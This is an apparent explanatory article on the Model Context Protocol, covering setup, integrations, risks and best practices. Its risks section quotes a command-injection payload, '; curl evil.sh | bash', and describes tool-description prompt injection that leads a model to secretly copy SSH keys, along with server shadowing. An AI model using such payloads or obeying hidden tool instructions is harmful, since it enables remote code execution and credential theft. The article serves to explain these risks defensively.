Do you remember the moment when USB-C eliminated the cable chaos? Whether hard disk, monitor or smartphone: one plug is enough these days. Since the end of 2024, the AI world has been experiencing the same aha effect at data and tool level: the Model Context Protocol (MCP) provides the universal connection via which AI language models can retrieve structured information from other tools and thus execute actions.
Before MCP appeared, each team wrote their own scripts for each data source and laboriously linked them to an LLM. Today, we do the job once according to the protocol and every model can get started. In this article, you will find out why we need MCP servers, how they work, where they already help today, but also what risks you should be aware of.
What is MCP and where does the term come from?
"MCP" stands for "Model Context Protocol". An MCP server acts as an interpreter between a large language model (LLM) and the programs, databases and services of your tech stack - e.g. HubSpot or Notion.
The protocol originated at Anthropic, which published an initial open-source reference implementation on GitHub on November 25, 2024. Just a few months later, OpenAI, Google and Microsoft (Azure AI Foundry) integrated MCP into their agent frameworks. An MCP server provides the language model with structured context and translates its responses into specific commands. Instead of just moving text back and forth, the model now says create_branch, start_vm or send_invoice, and the server executes the order in the appropriate system.
Example - your online store
Let's assume you have an online store. There you can define in the backend which commands your store backend accepts (e.g. get_order, create_client etc.). Now any MCP-enabled AI can create orders, adjust deliveries or send invoices without you having to add a single line of SDK code. If you later develop a new model or change the cloud provider, the interface remains unchanged. The server continues to speak the same "language" and protects you from breakpoints.
The fact that we did not need such a level until now was simply due to the fact that for a long time language models only generated texts. It was only when agent concepts became popular that expectations rose: If the model already knows what to do, why is a human still clicking? MCP closes this gap. Thanks to the MCP server, an AI can now also perform actions in external tools. At the same time, you retain control because the manifest specifies which commands are permitted, which parameters remain valid and when the model asks questions.
Analogy from real life
Imagine you have a personal assistant who speaks the "language" of various institutions - tax office, tax consultant, banks. They know the telephone numbers, the contact persons and your information. Instead of you having to deal with each individual institution, your assistant can do it for you.

The institutions here are your external tools (HubSpot, Xano, Notion, etc.). If these tools have an MCP server, any MCP-capable AI can communicate with them without you having to "teach" the AI the API documentation of each tool.
MCP vs. API: Differences and similarities
You might be wondering, "Is MCP simply a REST API?" An API , short for "Application Programming Interface," defines precise paths: GET /contacts/1242 returns the data of a customer with ID 1242, while POST /orders creates a new order. It's a direct communication channel for developers and transports only raw data. An MCP server goes further, explaining to the language model when and why this data is important , offering the appropriate tool, and immediately incorporating the result into the model's response.
Both approaches move data from one system to another and often use the same endpoints. An MCP server therefore calls up the same route, extracts the response and continues working with it. This is where the similarities end.
An API provides individual functions without worrying about their context. The MCP server, on the other hand, not only provides the language model with raw data, but also classifies it, assigns parameters to it and determines which steps are subsequently possible. Its manifest describes which tools the model is allowed to call, which inputs are valid and when it should query.
Let's assume your store backend offers GET /orders/123. The MCP server pulls this order, forms a context document from it and sends it to the model. If the customer asks: "Can you change my delivery to express?", the model recognizes that it is about order 123, selects the update_shipment tool and passes the parameters for express delivery. The server then calls POST /shipments/express, checks the response and formulates an understandable confirmation for the customer. The REST API remains the stable data provider, the MCP server ensures that the language model understands the information and executes the desired action in one go.

How do you use MCP? And how should you use it?
An MCP server gives your AI two basic abilities: acting and understanding. First, the agent can independently send emails, update database entries or create a Google Doc without any additional scripts. At the same time, the server connects the language model with your tech stack so that CRM data, ERP bookings or Confluence articles are incorporated as structured context. This creates answers that are technically correct and can be written directly back into the system if required. Only share the tools that are really necessary, validate each input carefully and log all actions transparently. In this way, automation and governance run harmoniously together while you retain an overview at all times.
How and where can you set up an MCP server?
An MCP system always consists of a server that offers tools and a client that uses these tools. One of the first and most popular clients is Claude Desktopwhich is offered by Anthropic, the inventors of the MCP. As it runs as a local program on your Windows or macOS computer, it can also interact with local environments, such as the file system. To do this, open "File → Settings → Developer → Edit configuration", insert the quick start snippet for your desired server and save. After restarting the app, a tool icon appears below the input field; commands such as "create folder reports 2025" are now executed directly as a tool call. Even with local MCP setups, there are exciting possibilities and you can implement ideas with programs that you have never used before, for example with the 3D modeler Blender.
Alternatively, you can also connect remote servers via SSE. If you want to connect a hosted server, enter its URL in the same view or via the command claude mcp add --transport sse .... SSE (Server-Sent Events) uses a simple, permanently open HTTP connection via which the server immediately sends its response to the client. You can find such servers in various directories, for example on mcp.so. More than 15,000 servers are now listed here, filterable by category and popularity mcp.so. Things are a little more curated at mcpservers.org.
For web UIs such as ChatGPT, Gemini or Perplexity, the Chrome plugin MCP SuperAssistant is available. After installation, start a small local proxy server with npx @srbhptl39/mcp-superassistant-proxy@latest --config ./mcpconfig.json. If you activate the MCP button in the plugin, a sidebar shows all available tools; you can select whether calls should run automatically or be confirmed manually.
If you prefer to work only in the browser, you might want to try Runner H out. In the "MCPS" menu, you can connect Google services, Notion, Slack or Zapier actions in just a few clicks via OAuth login - unfortunately, the selection of available services is still quite limited. In chat, @tool: followed by your task, such as a new line in Google Sheets, and Runner H executes the task and logs the result.
Development environments now also include MCP support. In Cursor IDE you create project-related servers under "MCP Servers", in Windsurf you will find the same function in the settings. This allows agents to start tests, read logs or initiate deploy tasks while you continue to work on the code.
You can also integrate existing automations via the Make or Zapier MCP servers. Make turns any "on demand" scenario into an MCP tool that your client addresses via an SSE URL provided by Make. Zapier creates its own endpoint URL with one click, opening up access to thousands of apps without the need for further integration work.
4 application scenarios that are already running today
- Webflow: The official MCP server gives your agent live access to sites, collections and CMS fields. This allows you to create new blog posts, update SEO titles or trigger releases without having to maintain your own integration scripts.
- Wix Studio: The hosted server covers eCommerce, Bookings, Payments, Blog, CMS and CRM. After a one-off OAuth setup, an AI can update products, adjust prices or create events while remaining in the secure Wix cloud.
- Figma Dev Mode: If you activate the local MCP server, Figma delivers variables, component IDs and layout dimensions directly to your code agent. This results in clean React or Tailwind code that automatically complies with design system specifications.
- Airtable: The open source project airtable-mcp-server provides tools such as list_records, search_records and create_record . A personal access token is sufficient for the agent to search tables, generate reports or create new data records.
What dangers can MCP servers harbor?
Wherever data flows, risks lurk - and MCP servers are a particularly tempting target because they stand between models and company systems. If someone gets hold of your access token, they can control every connected tool. Security researchers found insecure shell calls in over forty percent of the implementations tested; a seemingly harmless parameter such as ; curl evil.sh | bash is then sufficient for remote code execution. Another research team also showed how commands can be hidden in the description text of a tool: The model reads the hidden instruction, secretly copies SSH keys and nobody notices the theft. Danger remains even after installation, as tools can change their own definition and later forward requests to a foreign server without being noticed. In environments with several servers, a manipulated copy can intercept the calls of a trusted one and falsify the responses.
Even without an active attack, there is a risk of leaks if the server transmits context packets unencrypted or logs them in plain text. Customer or health data must not appear in logs or in prompt histories. In addition, large language models like to invent functions; if the model suddenly requests delete_database, the server must block and trigger an alarm.
These vulnerabilities arise because the specification places convenience above security . It does not require authentication, encryption or proof of integrity . Microsoft responds with a curated registry, requires strict login and shows consent prompts for risky actions. Anthropic recommends treating every model as untrusted , as if every prompt came from an anonymous Internet person.
Best practices for your MCP use
- Fine-grained authorizations (Least Privilege Principle): Only grant the MCP server and each tool the rights that are currently absolutely necessary. Write or admin scopes run automatically so that superfluous access does not become a gateway.
- Authentication and authorization: Protect all endpoints with multi-factor authentication; tokens are short-lived, strictly limited and are immediately rotated in the event of anomalies. A stolen token thus becomes worthless before any damage is done.
- Monitoring and auditing: Record all interactions in encrypted form and analyze them in real time. Alarms for anomalies - for example mass update_record in seconds - stop attacks at an early stage.
- Prompt engineering and guardrails: Clearly define in the manifest which commands are permitted and force the model to ask for clarification if anything is unclear. Guardrails block hallucinated or injected calls such as delete_database.
- Error handling: Implement routines that recognize unreachable tools or incorrect responses, log the incident and abort the workflow in a controlled manner. This keeps processes transparent and recoverable.
- Documentation and versioning: File each manifest in version control and subject changes to peer review. Precise documentation describes expected inputs, outputs and security rules so that all team members can understand the deployment.
Conclusion
MCP brings order to the existing integration island solutions. A single manifest describes which tools a model may use and a server provides them in a structured form. This eliminates the maintenance effort for dozens of special scripts, while authorizations remain clear and verifiable. However, this simplification does not come without effort. If you want to use an MCP server productively, you have to model the manifest cleanly, secure the server against unauthorized access, log all calls seamlessly and store sensitive log data in encrypted form.
This effort is worthwhile because the protocol is quickly gaining acceptance. Major providers such as Anthropic, Google, Microsoft and various developer tools have already integrated or announced MCP, and others are likely to follow. Those who start their first pilot projects now will build up expertise as the standard becomes established, giving them a real head start.
Consistent data protection remains crucial. Only transfer confidential information if it is essential for the task, keep tokens to the smallest possible functional scope and delete or anonymize logs within clearly defined deadlines. If this responsible approach is successful, MCP provides a reliable basis for bringing AI automation safely into everyday working life and keeping every action traceable.